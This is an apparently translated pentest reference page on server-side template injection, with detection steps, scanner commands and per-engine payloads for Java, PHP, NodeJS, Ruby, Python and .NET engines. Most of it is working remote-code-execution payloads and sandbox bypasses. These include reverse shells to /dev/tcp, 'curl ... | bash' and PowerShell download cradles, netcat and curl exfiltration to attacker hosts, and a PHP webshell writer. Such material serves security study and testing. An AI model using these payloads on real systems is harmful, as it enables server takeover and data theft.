SSTI (Server Side Template Injection)

Reading time: 35 minutes

什么是 SSTI (Server-Side Template Injection)

Server-side template injection 是一种漏洞，当攻击者可以将恶意代码注入到在服务器上执行的模板时就会发生。该漏洞可以出现在多种技术中，包括 Jinja。

Jinja 是一个在 web 应用中常用的模板引擎。下面来看一个示例，演示使用 Jinja 的易受攻击的代码片段：

output = template.render(name=request.args.get('name'))

在这段存在漏洞的代码中，来自用户请求的 name 参数被直接通过 render 函数传入模板。这可能允许攻击者将恶意代码注入到 name 参数中，从而导致 server-side template injection。

例如，攻击者可以构造一个包含如下 payload 的请求：

http://vulnerable-website.com/?name={{bad-stuff-here}}

The payload {{bad-stuff-here}} is injected into the name parameter. This payload can contain Jinja template directives that enable the attacker to execute unauthorized code or manipulate the template engine, potentially gaining control over the server.

为了防止 server-side template injection 漏洞，开发者应确保在将用户输入插入模板之前对其进行适当的清理和验证。实施输入验证并使用上下文感知的转义技术可以帮助降低此类漏洞的风险。

Detection

To detect Server-Side Template Injection (SSTI), initially, fuzzing the template is a straightforward approach. This involves injecting a sequence of special characters (${{<%[%'"}}%\) into the template and analyzing the differences in the server's response to regular data versus this special payload. Vulnerability indicators include:

• 抛出错误，暴露漏洞并可能指示模板引擎。
• 在反射中缺少 payload，或其中部分丢失，意味着服务器以不同于常规数据的方式处理它。
• Plaintext Context：通过检查服务器是否评估模板表达式（例如 {{7*7}}、${7*7}）来区分 XSS。
• Code Context：通过更改输入参数确认漏洞。例如，修改 http://vulnerable-website.com/?greeting=data.username 中的 greeting，以查看服务器输出是动态的还是固定的；像 greeting=data.username}}hello 返回用户名的情况即为验证。

Identification Phase

识别模板引擎通常需要分析错误消息或手动测试各种语言特定的 payloads。常见会导致错误的 payload 包括 ${7/0}、{{7/0}} 和 <%= 7/0 %>。观察服务器对数学运算的响应有助于确定具体的模板引擎。

Identification by payloads

• 更多信息见 https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756

Tools

TInjA

an efficient SSTI + CSTI scanner which utilizes novel polyglots

tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..."
tinja url -u "http://example.com/" -d "username=Kirlia"  -c "PHPSESSID=ABC123..."

SSTImap

python3 sstimap.py -i -l 5
python3 sstimap.py -u "http://example.com/" --crawl 5 --forms
python3 sstimap.py -u "https://example.com/page?name=John" -s

Tplmap

python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade

Template Injection Table

一个交互式表格，包含最有效的 template injection polyglots 以及 44 个最重要的 template engines 的预期响应。

Exploits

Generic

在此 wordlist 中，你可以找到一些下列引擎环境中定义的 variables defined：

• https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt
• https://github.com/danielmiessler/SecLists/blob/25d4ac447efb9e50b640649f1a09023e280e5c9c/Discovery/Web-Content/burp-parameter-names.txt

Java

Java - Basic injection

${7*7}
${{7*7}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
// if ${...} doesn't work try #{...}, *{...}, @{...} or ~{...}.

Java - 检索系统的环境变量

${T(java.lang.System).getenv()}

Java - 检索 /etc/passwd

${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}

${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}

FreeMarker (Java)

你可以在 https://try.freemarker.apache.org 测试你的 payloads

• {{7*7}} = {{7*7}}
• ${7*7} = 49
• #{7*7} = 49 -- (legacy)
• ${7*'7'} Nothing
• ${foobar}

<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
${"freemarker.template.utility.Execute"?new()("id")}

${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/home/carlos/my_password.txt').toURL().openStream().readAllBytes()?join(" ")}

Freemarker - Sandbox bypass

⚠️ 仅适用于 Freemarker 版本低于 2.3.30

<#assign classloader=article.class.protectionDomain.classLoader>
<#assign owc=classloader.loadClass("freemarker.template.ObjectWrapper")>
<#assign dwf=owc.getField("DEFAULT_WRAPPER").get(null)>
<#assign ec=classloader.loadClass("freemarker.template.utility.Execute")>
${dwf.newInstance(ec,null)("id")}

更多信息

• 在 FreeMarker 部分： https://portswigger.net/research/server-side-template-injection
• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker

Velocity (Java)

// I think this doesn't work
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end

// This should work?
#set($s="")
#set($stringClass=$s.getClass())
#set($runtime=$stringClass.forName("java.lang.Runtime").getRuntime())
#set($process=$runtime.exec("cat%20/flag563378e453.txt"))
#set($out=$process.getInputStream())
#set($null=$process.waitFor() )
#foreach($i+in+[1..$out.available()])
$out.read()
#end

更多信息

• 在 https://portswigger.net/research/server-side-template-injection 的 Velocity 部分
• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#velocity

Thymeleaf

在 Thymeleaf 中，常用来检测 SSTI 漏洞的表达式是 ${7*7}，该表达式也适用于这个模板引擎。要尝试实现 remote code execution，可以使用类似下面的表达式：

• SpringEL:

${T(java.lang.Runtime).getRuntime().exec('calc')}

• OGNL:

${#rt = @java.lang.Runtime@getRuntime(),#rt.exec("calc")}

Thymeleaf 要求这些表达式放在特定属性中。然而，表达式内联 支持在其他模板位置使用，语法类似于 [[...]] 或 [(...)]。因此，一个简单的 SSTI 测试 payload 可能是 [[${7*7}]]。

不过，该 payload 成功的可能性通常很低。Thymeleaf 的默认配置不支持动态模板生成；模板必须预先定义。开发者需要实现自定义的 TemplateResolver 来按需从字符串生成模板，这种做法并不常见。

Thymeleaf 还提供了 expression preprocessing（表达式预处理），其中位于双下划线内的表达式（__...__）会被预处理。可以在构造表达式时利用此功能，如 Thymeleaf 文档所示：

#{selection.__${sel.code}__}

Thymeleaf 中的漏洞示例

考虑下面的代码片段，它可能易受利用：

<a th:href="@{__${path}__}" th:title="${title}">
<a th:href="${''.getClass().forName('java.lang.Runtime').getRuntime().exec('curl -d @/flag.txt burpcollab.com')}" th:title='pepito'>

这表明如果模板引擎不正确地处理这些输入，可能会导致 remote code execution，访问如下 URL：

http://localhost:8082/(7*7)
http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})

更多信息

• https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/

EL - Expression Language

Spring Framework (Java)

*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}

绕过过滤器

可以使用多种变量表达式，如果 ${...} 不工作，尝试 #{...}、*{...}、@{...} 或 ~{...}。

• 读取 /etc/passwd

${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}

• 用于 payload 生成的自定义脚本

#!/usr/bin/python3

## Written By Zeyad Abulaban (zAbuQasem)
# Usage: python3 gen.py "id"

from sys import argv

cmd = list(argv[1].strip())
print("Payload: ", cmd , end="\n\n")
converted = [ord(c) for c in cmd]
base_payload = '*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec'
end_payload = '.getInputStream())}'

count = 1
for i in converted:
if count == 1:
base_payload += f"(T(java.lang.Character).toString({i}).concat"
count += 1
elif count == len(converted):
base_payload += f"(T(java.lang.Character).toString({i})))"
else:
base_payload += f"(T(java.lang.Character).toString({i})).concat"
count += 1

print(base_payload + end_payload)

更多信息

• Thymleaf SSTI
• Payloads all the things

Spring 视图操作 (Java)

__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x
__${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x

• https://github.com/veracode-research/spring-view-manipulation

EL - Expression Language

Pebble (Java)

• {{ someString.toUPPERCASE() }}

旧版本的 Pebble ( < version 3.0.9):

{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}

Pebble 的新版本 :

{% raw %}
{% set cmd = 'id' %}
{% endraw %}






{% set bytes = (1).TYPE
.forName('java.lang.Runtime')
.methods[6]
.invoke(null,null)
.exec(cmd)
.inputStream
.readAllBytes() %}
{{ (1).TYPE
.forName('java.lang.String')
.constructors[0]
.newInstance(([bytes]).toArray()) }}

Jinjava (Java)

{{'a'.toUpperCase()}} would result in 'A'
{{ request }} would return a request object like com.[...].context.TemplateContextRequest@23548206

Jinjava 是由 Hubspot 开发的开源项目，托管于 https://github.com/HubSpot/jinjava/

Jinjava - 命令执行

已通过 https://github.com/HubSpot/jinjava/pull/230 修复

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}

更多信息

• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinjava

Hubspot - HuBL (Java)

• {% %} 语句定界符
• {{ }} 表达式定界符
• {# #} 注释定界符
• {{ request }} - com.hubspot.content.hubl.context.TemplateContextRequest@23548206
• {{'a'.toUpperCase()}} - "A"
• {{'a'.concat('b')}} - "ab"
• {{'a'.getClass()}} - java.lang.String
• {{request.getClass()}} - class com.hubspot.content.hubl.context.TemplateContextRequest
• {{request.getClass().getDeclaredMethods()[0]}} - public boolean com.hubspot.content.hubl.context.TemplateContextRequest.isDebug()

搜索 "com.hubspot.content.hubl.context.TemplateContextRequest" 并发现了 Jinjava project on Github.

{{request.isDebug()}}
//output: False

//Using string 'a' to get an instance of class sun.misc.Launcher
{{'a'.getClass().forName('sun.misc.Launcher').newInstance()}}
//output: sun.misc.Launcher@715537d4

//It is also possible to get a new object of the Jinjava class
{{'a'.getClass().forName('com.hubspot.jinjava.JinjavaConfig').newInstance()}}
//output: com.hubspot.jinjava.JinjavaConfig@78a56797

//It was also possible to call methods on the created object by combining the



{% raw %}
{% %} and {{ }} blocks
{% set ji='a'.getClass().forName('com.hubspot.jinjava.Jinjava').newInstance().newInterpreter() %}
{% endraw %}


{{ji.render('{{1*2}}')}}
//Here, I created a variable 'ji' with new instance of com.hubspot.jinjava.Jinjava class and obtained reference to the newInterpreter method. In the next block, I called the render method on 'ji' with expression {{1*2}}.

//{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
//output: xxx

//RCE
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
//output: java.lang.UNIXProcess@1e5f456e

//RCE with org.apache.commons.io.IOUtils.
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
//output: netstat execution

//Multiple arguments to the commands
Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
//Output: Linux bumpy-puma 4.9.62-hs4.el6.x86_64 #1 SMP Fri Jun 1 03:00:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

更多信息

• https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html

Expression Language - EL (Java)

• ${"aaaa"} - "aaaa"
• ${99999+1} - 100000.
• #{7*7} - 49
• ${{7*7}} - 49
• ${{request}}, ${{session}}, {{faceContext}}

Expression Language (EL) 是一个基础特性，便于表示层（如网页）与应用逻辑（如 managed beans）之间的交互。它在多个 JavaEE 技术中被广泛使用以简化这种通信。主要使用 EL 的 JavaEE 技术包括：

• JavaServer Faces (JSF)：使用 EL 将 JSF 页面中的组件绑定到相应的后端数据和操作。
• JavaServer Pages (JSP)：在 JSP 中使用 EL 来访问和操作页面内的数据，使页面元素更容易与应用数据连接。
• Contexts and Dependency Injection for Java EE (CDI)：EL 与 CDI 集成，使 Web 层与 managed beans 之间实现无缝交互，从而确保更一致的应用结构。

请查看以下页面以了解有关 EL 解释器利用 的更多信息：

EL - Expression Language

Groovy (Java)

The following Security Manager bypasses were taken from this writeup.

//Basic Payload
import groovy.*;
@groovy.transform.ASTTest(value={
cmd = "ping cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net "
assert java.lang.Runtime.getRuntime().exec(cmd.split(" "))
})
def x

//Payload to get output
import groovy.*;
@groovy.transform.ASTTest(value={
cmd = "whoami";
out = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmd.split(" ")).getInputStream()).useDelimiter("\\A").next()
cmd2 = "ping " + out.replaceAll("[^a-zA-Z0-9]","") + ".cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net";
java.lang.Runtime.getRuntime().exec(cmd2.split(" "))
})
def x

//Other payloads
new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x")
this.evaluate(new String(java.util.Base64.getDecoder().decode("QGdyb292eS50cmFuc2Zvcm0uQVNUVGVzdCh2YWx1ZT17YXNzZXJ0IGphdmEubGFuZy5SdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKCJpZCIpfSlkZWYgeA==")))
this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 114, 97, 110, 115, 102, 111, 114, 109, 46, 65, 83, 84, 84, 101, 115, 116, 40, 118, 97, 108, 117, 101, 61, 123, 97, 115, 115, 101, 114, 116, 32, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101, 46, 103, 101, 116, 82,117, 110, 116, 105, 109, 101, 40, 41, 46, 101, 120, 101, 99, 40, 34, 105, 100, 34, 41, 125, 41, 100, 101, 102, 32, 120}))

其他 Java

• 更多信息在 https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756

Smarty (PHP)

{$smarty.version}
{php}echo `id`;{/php} //deprecated in smarty v3
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
{system('ls')} // compatible v3
{system('cat index.php')} // compatible v3

更多信息

• 在 Smarty 部分，参见 https://portswigger.net/research/server-side-template-injection
• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty

Twig (PHP)

• {{7*7}} = 49
• ${7*7} = ${7*7}
• {{7*'7'}} = 49
• {{1/0}} = Error
• {{foobar}} Nothing

#Get Info
{{_self}} #(Ref. to current application)
{{_self.env}}
{{dump(app)}}
{{app.request.server.all|join(',')}}

#File read
"{{'/etc/passwd'|file_excerpt(1,30)}}"@

#Exec code
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("whoami")}}
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id;uname -a;hostname")}}
{{['id']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
{{['id',""]|sort('system')}}

#Hide warnings and errors for automatic exploitation
{{["error_reporting", "0"]|sort("ini_set")}}

Twig - 模板格式

$output = $twig > render (
'Dear' . $_GET['custom_greeting'],
array("first_name" => $user.first_name)
);

$output = $twig > render (
"Dear {first_name}",
array("first_name" => $user.first_name)
);

更多信息

• 在 https://portswigger.net/research/server-side-template-injection 的 Twig 和 Twig (Sandboxed) 部分
• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig

Plates (PHP)

Plates 是一个原生于 PHP 的模板引擎，借鉴了 Twig。 然而，不同于引入新语法的 Twig，Plates 在模板中利用原生 PHP 代码，使其对 PHP 开发者直观易用。

控制器：

// Create new Plates instance
$templates = new League\Plates\Engine('/path/to/templates');

// Render a template
echo $templates->render('profile', ['name' => 'Jonathan']);

页面模板:

<?php $this->layout('template', ['title' => 'User Profile']) ?>

<h1>User Profile</h1>
<p>Hello, <?=$this->e($name)?></p>

布局模板：

<html>
<head>
<title><?=$this->e($title)?></title>
</head>
<body>
<?=$this->section('content')?>
</body>
</html>

更多信息

• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#plates

PHPlib 与 HTML_Template_PHPLIB (PHP)

HTML_Template_PHPLIB 与 PHPlib 相同，但已移植到 Pear。

authors.tpl

<html>
<head>
<title>{PAGE_TITLE}</title>
</head>
<body>
<table>
<caption>
Authors
</caption>
<thead>
<tr>
<th>Name</th>
<th>Email</th>
</tr>
</thead>
<tfoot>
<tr>
<td colspan="2">{NUM_AUTHORS}</td>
</tr>
</tfoot>
<tbody>
<!-- BEGIN authorline -->
<tr>
<td>{AUTHOR_NAME}</td>
<td>{AUTHOR_EMAIL}</td>
</tr>
<!-- END authorline -->
</tbody>
</table>
</body>
</html>

authors.php

<?php
//we want to display this author list
$authors = array(
'Christian Weiske'  => 'cweiske@php.net',
'Bjoern Schotte'     => 'schotte@mayflower.de'
);

require_once 'HTML/Template/PHPLIB.php';
//create template object
$t =& new HTML_Template_PHPLIB(dirname(__FILE__), 'keep');
//load file
$t->setFile('authors', 'authors.tpl');
//set block
$t->setBlock('authors', 'authorline', 'authorline_ref');

//set some variables
$t->setVar('NUM_AUTHORS', count($authors));
$t->setVar('PAGE_TITLE', 'Code authors as of ' . date('Y-m-d'));

//display the authors
foreach ($authors as $name => $email) {
$t->setVar('AUTHOR_NAME', $name);
$t->setVar('AUTHOR_EMAIL', $email);
$t->parse('authorline_ref', 'authorline', true);
}

//finish and echo
echo $t->finish($t->parse('OUT', 'authors'));
?>

更多信息

• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#phplib-and-html_template_phplib

其他 PHP

• 更多信息在 https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756

Jade (NodeJS)

- var x = root.process
- x = x.mainModule.require
- x = x('child_process')
= x.exec('id | nc attacker.net 80')

#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}

更多信息

• 在 Jade 部分： https://portswigger.net/research/server-side-template-injection
• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen

patTemplate (PHP)

patTemplate 非编译型 PHP 模板引擎，使用 XML 标签将文档划分为不同的部分。

<patTemplate:tmpl name="page">
This is the main page.
<patTemplate:tmpl name="foo">
It contains another template.
</patTemplate:tmpl>
<patTemplate:tmpl name="hello">
Hello {NAME}.<br/>
</patTemplate:tmpl>
</patTemplate:tmpl>

更多信息

• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#pattemplate

Handlebars (NodeJS)

Path Traversal (更多信息 here).

curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"profile\":{"layout\": \"./../routes/index.js\"}}' 'http://ctf.shoebpatel.com:9090/'

• = 错误
• ${7*7} = ${7*7}
• 无

{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return require('child_process').exec('whoami');"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}

URLencoded:
%7B%7B%23with%20%22s%22%20as%20%7Cstring%7C%7D%7D%0D%0A%20%20%7B%7B%23with%20%22e%22%7D%7D%0D%0A%20%20%20%20%7B%7B%23with%20split%20as%20%7Cconslist%7C%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epush%20%28lookup%20string%2Esub%20%22constructor%22%29%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%7B%7B%23with%20string%2Esplit%20as%20%7Ccodelist%7C%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epush%20%22return%20require%28%27child%5Fprocess%27%29%2Eexec%28%27whoami%27%29%3B%22%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7B%23each%20conslist%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%23with%20%28string%2Esub%2Eapply%200%20codelist%29%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7B%7Bthis%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7B%2Feach%7D%7D%0D%0A%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%7B%7B%2Fwith%7D%7D%0D%0A%7B%7B%2Fwith%7D%7D

更多信息

• http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html

JsRender (NodeJS)

• = 49

客户端

{{:%22test%22.toString.constructor.call({},%22alert(%27xss%27)%22)()}}

服务器端

{{:"pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}}

更多信息

• https://appcheck-ng.com/template-injection-jsrender-jsviews/

PugJs (NodeJS)

• #{7*7} = 49
• #{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('touch /tmp/pwned.txt')}()}
• #{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl 10.10.14.3:8001/s.sh | bash')}()}

示例：服务器端渲染

var pugjs = require("pug")
home = pugjs.render(injected_page)

更多信息

• https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/

NUNJUCKS (NodeJS)

• {{7*7}} = 49
• {{foo}} = 没有输出
• #{7*7} = #{7*7}
• {{console.log(1)}} = 错误

{
{
range.constructor(
"return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')"
)()
}
}
{
{
range.constructor(
"return global.process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/10.10.14.11/6767 0>&1\"')"
)()
}
}

更多信息

• http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine

其他 NodeJS

• 更多信息请见 https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756

ERB (Ruby)

• {{7*7}} = {{7*7}}
• ${7*7} = ${7*7}
• <%= 7*7 %> = 49
• <%= foobar %> = Error

<%= system("whoami") %> #Execute code
<%= Dir.entries('/') %> #List folder
<%= File.open('/etc/passwd').read %> #Read file

<%= system('cat /etc/passwd') %>
<%= `ls /` %>
<%= IO.popen('ls /').readlines()  %>
<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>

更多信息

• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby

Slim (Ruby)

• { 7 * 7 }

{ %x|env| }

更多信息

• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby

其他 Ruby

• 更多信息见 https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756

Python

查看以下页面以学习在 python 中关于 arbitrary command execution bypassing sandboxes 的技巧：

Bypass Python sandboxes

Tornado (Python)

• {{7*7}} = 49
• ${7*7} = ${7*7}
• {{foobar}} = Error
• {{7*'7'}} = 7777777

{% raw %}
{% import foobar %} = Error
{% import os %}

{% import os %}
{% endraw %}







{{os.system('whoami')}}
{{os.system('whoami')}}

更多信息

• https://ajinabraham.com/blog/server-side-template-injection-in-tornado

Jinja2 (Python)

官方网站

Jinja2 是一个功能齐全的用于 Python 的模板引擎。它具有完整的 Unicode 支持、可选的集成沙箱执行环境、被广泛使用并采用 BSD 许可。

• {{7*7}} = Error
• ${7*7} = ${7*7}
• {{foobar}} Nothing
• {{4*4}}[[5*5]]
• {{7*'7'}} = 7777777
• {{config}}
• {{config.items()}}
• {{settings.SECRET_KEY}}
• {{settings}}
• <div data-gb-custom-block data-tag="debug"></div>

{% raw %}
{% debug %}
{% endraw %}







{{settings.SECRET_KEY}}
{{4*4}}[[5*5]]
{{7*'7'}} would result in 7777777

Jinja2 - 模板格式

{% raw %}
{% extends "layout.html" %}
{% block body %}
<ul>
{% for user in users %}
<li><a href="{{ user.url }}">{{ user.username }}</a></li>
{% endfor %}
</ul>
{% endblock %}
{% endraw %}

RCE 不依赖于 __builtins__:

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}

# Or in the shotest versions:
{{ cycler.__init__.__globals__.os.popen('id').read() }}
{{ joiner.__init__.__globals__.os.popen('id').read() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }}

关于如何滥用 Jinja 的更多细节:

Jinja2 SSTI

其他 payloads 在 https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2

Mako (Python)

<%
import os
x=os.popen('id').read()
%>
${x}

更多信息

• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#mako

其他 Python

• 更多信息： https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756

Razor (.Net)

• @(2+2) <= Success
• @() <= Success
• @("{{code}}") <= Success
• @ <=Success
• @{} <= ERROR!
• @{ <= ERRROR!
• @(1+2)
• @( //C#Code )
• @System.Diagnostics.Process.Start("cmd.exe","/c echo RCE > C:/Windows/Tasks/test.txt");
• @System.Diagnostics.Process.Start("cmd.exe","/c powershell.exe -enc IABpAHcAcgAgAC0AdQByAGkAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAyAC4AMQAxADEALwB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAYQBzAGsAcwBcAHQAZQBzAHQAbQBlAHQANgA0AC4AZQB4AGUAOwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXAB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlAA==");

The .NET System.Diagnostics.Process.Start method can be used to start any process on the server and thus create a webshell. You can find a vulnerable webapp example in https://github.com/cnotin/RazorVulnerableApp

更多信息

• https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/
• https://www.schtech.co.uk/razor-pages-ssti-rce/

ASP

• <%= 7*7 %> = 49
• <%= "foo" %> = foo
• <%= foo %> = 无
• <%= response.write(date()) %> = <Date>

<%= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %>
